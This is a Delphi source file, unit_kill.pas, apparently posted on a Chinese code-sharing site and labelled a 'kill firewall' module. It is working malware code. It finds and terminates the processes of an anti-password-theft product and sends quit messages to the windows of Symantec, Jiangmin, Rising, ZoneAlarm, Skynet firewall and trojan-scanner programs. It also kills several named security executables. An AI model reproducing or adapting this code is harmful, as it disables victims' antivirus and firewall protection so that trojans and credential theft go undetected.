📄 unit_kill.pas
字号:
unit Unit_Kill;
{
杀防火墙模块.
}
interface
uses
Windows,TLHelp32;
procedure Killer;
implementation
function AnsiCompareText(const S1, S2: string): Integer;
begin
Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, PChar(S1),
Length(S1), PChar(S2), Length(S2)) - 2;
end;
function UpperCase(AStr:string):string; overload;
var
LI:Integer;
begin
Result:=AStr;
for LI:=1 to Length(Result) do
Result[LI]:=System.UpCase(Result[LI]);
end;
function ExtractFilePath(APath:string):string;
var
LI,LJ:Integer;
begin
if (Length(APath)<>0) and (Pos('\',APath)>0) then
begin
LJ:=0;
for LI:=Length(APath) downto 1 do
if APath[LI]='\' then
begin
LJ:=LI;
Break;
end;
Result:=Copy(APath,1,LJ);
end else Result:='';
end;
function ExtractFileName(APath:string):string;
var
LI,LJ:Integer;
begin
if Length(APath)<>0 then
begin
LJ:=0;
for LI:=Length(APath) downto 1 do
if APath[LI]='\' then
begin
LJ:=LI;
Break;
end;
Result:=Copy(APath,LJ+1,MaxInt);
end else Result:='';
end;
function OpenKey(Root:HKEY;StrPath:pchar):Hkey;
var TempKey:Hkey;
begin
TempKey:=0;
RegOpenKeyEx(Root,StrPath,0,KEY_ALL_ACCESS,TempKey);
Result:=TempKey;
end;
function ReadValue(Root:HKEY;StrPath:pchar;StrValue:pchar):String;
var s:Hkey; ValueType:DWORD; MyData: array[0..255] of char; dLength: DWORD;
begin
ValueType:=REG_SZ;
s:=OpenKey(Root,StrPath);
dLength := SizeOf(MyData);
if RegQueryValueEx(s,StrValue,nil,@ValueType,@MyData[0],@dLength)=0 then begin
Result:=MyData;
RegCloseKey(s);
end else begin
Result:='';
RegCloseKey(s);
end;
end;
//-------------------------------------------------------------------------
function Killpro(TheProcName: string): boolean; //????(?????)
function KillProcess(ProcessID: Cardinal): boolean; //????(?????)
var
H: THandle;
begin
H := OpenProcess(Process_All_Access, true, ProcessID);
Result := TerminateProcess(H, 0);
end;
var
isOK: Boolean;
ProcessHandle: Thandle;
ProcessStruct: TProcessEntry32;
begin
ProcessHandle := createtoolhelp32snapshot(Th32cs_snapprocess, 0);
processStruct.dwSize := sizeof(ProcessStruct);
isOK := process32first(ProcessHandle, ProcessStruct);
while isOK do
begin
if UpperCase(ExtractFileName(TheProcName)) = UpperCase(ExtractFileName(ProcessStruct.szExeFile)) then
begin
Result := KillProcess(ProcessStruct.th32ProcessID);
CloseHandle(ProcessHandle);
exit;
end;
isOK := process32next(ProcessHandle, ProcessStruct);
end;
CloseHandle(ProcessHandle);
Result := True;
end;
procedure KillZhuanJia;
var
found: boolean;
s,path:string;
i:integer;
h,FindHandle: THandle;
FindData: TWin32FindData;
begin
path:=ReadValue(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\密码防盗专家 综合版','UninstallString');
if path='' then exit;
i:=pos(' ',path);
if i<>0 then delete(path,i,MaxInt);
path:=extractfilepath(Path);
FindHandle := FindFirstFile(PChar(path + '*.exe'), FindData);
s:='';
Found := FindHandle <> INVALID_HANDLE_VALUE;
while Found do begin //如果找到stg文件
{ if (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0)or
(Ansicomparetext(FindData.cFileName,'UNWISE.EXE')=0)or
(Ansicomparetext(FindData.cFileName,'autoupdate.exe')=0)or
(Ansicomparetext(FindData.cFileName,'magic.exe')=0)then }
if ((FindData.cFileName[0]>='0')and(FindData.cFileName[0]<='9'))or
(Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0) then
begin
h:=Integer(CreateFile(PChar(path+FindData.cFileName), GENERIC_WRITE,
0, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0));
if h= INVALID_HANDLE_VALUE then
begin
s:=uppercase(FindData.cFileName);
//Messagebox(0,pchar(s),'',0);
KillPro(s);
if (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0) then
KillPro(uppercase('PasswordGuard.e'));
end
else CloseHandle(h);
end;
Found := FindNextFile(FindHandle, FindData);
end;
Windows.FindClose(FindHandle);
end;
procedure Killer;
var
s, Desktop: integer;
str: array[0..100] of char;
begin
KillZhuanJia;
s:=FindWindow(nil,'Symantec AntiVirus 企业版');
if s<>0 then PostMessage(s,$0012,0,0);
s:=FindWindow(nil,'江民杀毒软件 KV2004:实时监视');
if s<>0 then PostMessage(s,$0012,0,0);
s := findwindow(pchar('RavMonClass'), pchar('RavMon.exe'));
if s<>0 then PostMessage(s,$0012,0,0);
s := findwindow(pchar('TfLockDownMain'), nil);
if s<>0 then PostMessage(s,$0012,0,0);
s := findwindow(pchar('ZAFrameWnd'), pchar('ZoneAlarm'));
if s<>0 then PostMessage(s,$0012,0,0);
s := findwindow('Tapplication', '天网防火墙个人版');
if s<>0 then PostMessage(s,$0012,0,0);
s := findwindow('Tapplication', '天网防火墙企业版');
if s<>0 then PostMessage(s,$0012,0,0);
s := 0;
Desktop := GetDesktopWindow;
repeat
s := findwindowex(Desktop, s, 'TForm1', nil);
getwindowtext(s, str, 7);
if str = '噬菌体' then PostMessage(s,$0012,0,0);
getwindowtext(s, str, 9);
if str = '木马克星' then PostMessage(s,$0012,0,0);
until s = 0;
Killpro('EGHOST.EXE');
// Killpro('Iparmor.exe');
Killpro('MAILMON.EXE');
Killpro('KAVPFW.EXE');
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -